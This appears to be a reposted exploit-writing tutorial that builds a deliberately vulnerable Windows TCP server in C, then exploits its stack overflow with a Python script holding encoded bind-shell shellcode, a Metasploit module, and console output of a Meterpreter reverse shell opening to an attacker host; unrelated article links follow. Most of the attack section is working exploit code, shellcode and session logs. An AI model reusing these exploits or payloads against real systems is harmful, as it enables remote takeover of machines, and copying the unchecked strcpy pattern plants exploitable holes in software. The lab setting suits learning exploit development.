exploit - write metasploit exploit script
2015-06-22 19:23
1431 查看
Create Vuln Server
Compile the source code with VC6.0 / Dev C++.#include <iostream.h> #include <stdio.h> #include <winsock.h> #include <windows.h> //load windows socket #pragma comment(lib, "wsock32.lib") //Define Return Messages #define SS_ERROR 1 #define SS_OK 0 void pr( char *str) { char buf[500]=""; strcpy(buf,str); } void sError(char *str) { MessageBox (NULL, str, "socket Error" ,MB_OK); WSACleanup(); } int main(int argc, char **argv) { WORD sockVersion; WSADATA wsaData; int rVal; char Message[5000]=""; char buf[2000]=""; // server port: 9000 u_short LocalPort; LocalPort = 9000; //wsock32 initialized for usage sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); //create server socket SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0); if(serverSocket == INVALID_SOCKET) { sError("Failed socket()"); return SS_ERROR; } SOCKADDR_IN sin; sin.sin_family = PF_INET; sin.sin_port = htons(LocalPort); sin.sin_addr.s_addr = INADDR_ANY; //bind the socket rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin)); if(rVal == SOCKET_ERROR) { sError("Failed bind()"); WSACleanup(); return SS_ERROR; } //get socket to listen rVal = listen(serverSocket, 10); if(rVal == SOCKET_ERROR) { sError("Failed listen()"); WSACleanup(); return SS_ERROR; } printf("[+] listening on tcp/9000... \n"); //wait for a client to connect SOCKET clientSocket; clientSocket = accept(serverSocket, NULL, NULL); if(clientSocket == INVALID_SOCKET) { sError("Failed accept()"); WSACleanup(); return SS_ERROR; } int bytesRecv = SOCKET_ERROR; while( bytesRecv == SOCKET_ERROR ) { //receive the data that is being sent by the client max limit to 5000 bytes. bytesRecv = recv( clientSocket, Message, 5000, 0 ); if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET ) { printf("\nConnection Closed.\n"); break; } } //Pass the data received to the function pr pr(Message); //close client socket closesocket(clientSocket); //close server socket closesocket(serverSocket); WSACleanup(); return SS_OK; }
Stack Overflow
Please exploit vuln-server.exe with stack overflow bug.#!/usr/bin/env python # -*- coding: utf8 -*- import socket csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ret = csock.connect_ex(("127.0.0.1", 9000)) if (ret == 0): junk = "A" * 500 eip = "\x7B\x46\x86\x7C" # 7C86467B # bad chars: 00 # windows/shell_bind_tcp - 355 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript= buf = "\x90" * 20 buf += "\xba\x09\xb0\x2e\x7e\xdb\xc0\xd9\x74\x24\xf4\x5d\x31" buf += "\xc9\xb1\x53\x83\xc5\x04\x31\x55\x0e\x03\x5c\xbe\xcc" buf += "\x8b\xa2\x56\x92\x74\x5a\xa7\xf3\xfd\xbf\x96\x33\x99" buf += "\xb4\x89\x83\xe9\x98\x25\x6f\xbf\x08\xbd\x1d\x68\x3f" buf += "\x76\xab\x4e\x0e\x87\x80\xb3\x11\x0b\xdb\xe7\xf1\x32" buf += "\x14\xfa\xf0\x73\x49\xf7\xa0\x2c\x05\xaa\x54\x58\x53" buf += "\x77\xdf\x12\x75\xff\x3c\xe2\x74\x2e\x93\x78\x2f\xf0" buf += "\x12\xac\x5b\xb9\x0c\xb1\x66\x73\xa7\x01\x1c\x82\x61" buf += "\x58\xdd\x29\x4c\x54\x2c\x33\x89\x53\xcf\x46\xe3\xa7" buf += "\x72\x51\x30\xd5\xa8\xd4\xa2\x7d\x3a\x4e\x0e\x7f\xef" buf += "\x09\xc5\x73\x44\x5d\x81\x97\x5b\xb2\xba\xac\xd0\x35" buf += "\x6c\x25\xa2\x11\xa8\x6d\x70\x3b\xe9\xcb\xd7\x44\xe9" buf += "\xb3\x88\xe0\x62\x59\xdc\x98\x29\x36\x11\x91\xd1\xc6" buf += "\x3d\xa2\xa2\xf4\xe2\x18\x2c\xb5\x6b\x87\xab\xba\x41" buf += "\x7f\x23\x45\x6a\x80\x6a\x82\x3e\xd0\x04\x23\x3f\xbb" buf += "\xd4\xcc\xea\x56\xdc\x6b\x45\x45\x21\xcb\x35\xc9\x89" buf += "\xa4\x5f\xc6\xf6\xd5\x5f\x0c\x9f\x7e\xa2\xaf\x8e\x22" buf += "\x2b\x49\xda\xca\x7d\xc1\x72\x29\x5a\xda\xe5\x52\x88" buf += "\x72\x81\x1b\xda\x45\xae\x9b\xc8\xe1\x38\x10\x1f\x36" buf += "\x59\x27\x0a\x1e\x0e\xb0\xc0\xcf\x7d\x20\xd4\xc5\x15" buf += "\xc1\x47\x82\xe5\x8c\x7b\x1d\xb2\xd9\x4a\x54\x56\xf4" buf += "\xf5\xce\x44\x05\x63\x28\xcc\xd2\x50\xb7\xcd\x97\xed" buf += "\x93\xdd\x61\xed\x9f\x89\x3d\xb8\x49\x67\xf8\x12\x38" buf += "\xd1\x52\xc8\x92\xb5\x23\x22\x25\xc3\x2b\x6f\xd3\x2b" buf += "\x9d\xc6\xa2\x54\x12\x8f\x22\x2d\x4e\x2f\xcc\xe4\xca" buf += "\x51\x3c\x34\xc7\xc6\xe7\xad\xaa\x8a\x17\x18\xe8\xb2" buf += "\x9b\xa8\x91\x40\x83\xd9\x94\x0d\x03\x32\xe5\x1e\xe6" buf += "\x34\x5a\x1e\x23" nops = "\x90" * 1500 payload = junk + eip + buf + nops csock.send(payload) csock.close()
Write MSF exploit script
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info={}) super(update_info(info, 'Name' => 'Custom Vulnable Tcp Server Buffer Overflow', 'Description' => %q{ 'This module exploits a custom windows tcp server' }, 'Author' => [ 'Nixawk' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'EXITFUNC' => 'process', 'AllowWin32SEH' => true }, 'Payload' => { 'Space' => 1400, 'BadChars' => "\x00\xFF", 'StackAdjustment' => -3500 }, 'Platform' => 'win', 'Targets' => [ ['Windows XP SP3 En', {'Ret' => 0x7C86467B, 'Offset' => 496}] ], 'Privileged' => false, 'DefaultTarget' => 0, 'DisclosureDate' => 'June 20 2015' )) register_options([Opt::RPORT(9000)], self.class) end def exploit # [*] Started reverse handler on 192.168.1.108:4444 # [-] Exploit failed: TypeError no implicit conversion of String into Integer connect sploit = rand_text(target['Offset']) sploit << generate_seh_record(target.ret) # sploit << make_nops(50) sploit << payload.encoded sock.put(sploit) handler disconnect end end
Exploit Vuln Server with MSF
msf exploit(custom_vulnserver) > show options Module options (exploit/windows/misc/custom_vulnserver): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.105 yes The target address RPORT 9000 yes The target port Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique (Accepted: , , seh, thread, process, none) LHOST 192.168.1.108 yes The listen address LPORT 8080 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP3 En msf exploit(custom_vulnserver) > exploit [*] Started reverse handler on 192.168.1.108:8080 [*] Sending stage (884270 bytes) to 192.168.1.105 [*] Meterpreter session 2 opened (192.168.1.108:8080 -> 192.168.1.105:1557) at 2015-06-22 11:16:47 +0000 meterpreter > sysinfo Computer : CORELAN-LAB OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : zh_CN Domain : MSHOME Logged On Users : 2 Meterpreter : x86/win32 meterpreter >
References
https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/相关文章推荐
- Asp.net弹出消息对话框
- 让Windows Server 2008 + IIS 7+ ASP.NET 支持10万并发请求
- ASP.NET错误
- Windows 使用 Yeoman generators 创建 ASP.NET 应用程序
- ASP.NET MVC5--添加验证
- ASP.NET MVC4中用 BundleCollection使用问题手记
- raspberry pi2 andrid
- 《微软ASP.NET站点部署指南》系列技术文章整理收藏
- ASP.NET 学习博客
- AOP那些学术概念—通知、增强处理连接点(JoinPoint)切面(Aspect)
- 【ASP.NET】基本对象
- raspberry fm电台
- raspberry 高级应用
- raspberry 2b 启动信息
- ASP.NET MVC5--为数据库新增字段(涉及数据库迁移技术)
- 总结ASP.NET中用到的几种代码
- asp.net web 服务器端全局定时执行任务
- ASP.NET定时执行任务
- 认识ASP.NET 5项目结构和项目文件xproj
- 【MVC】ASP.NET MVC 4项目模板的结构简介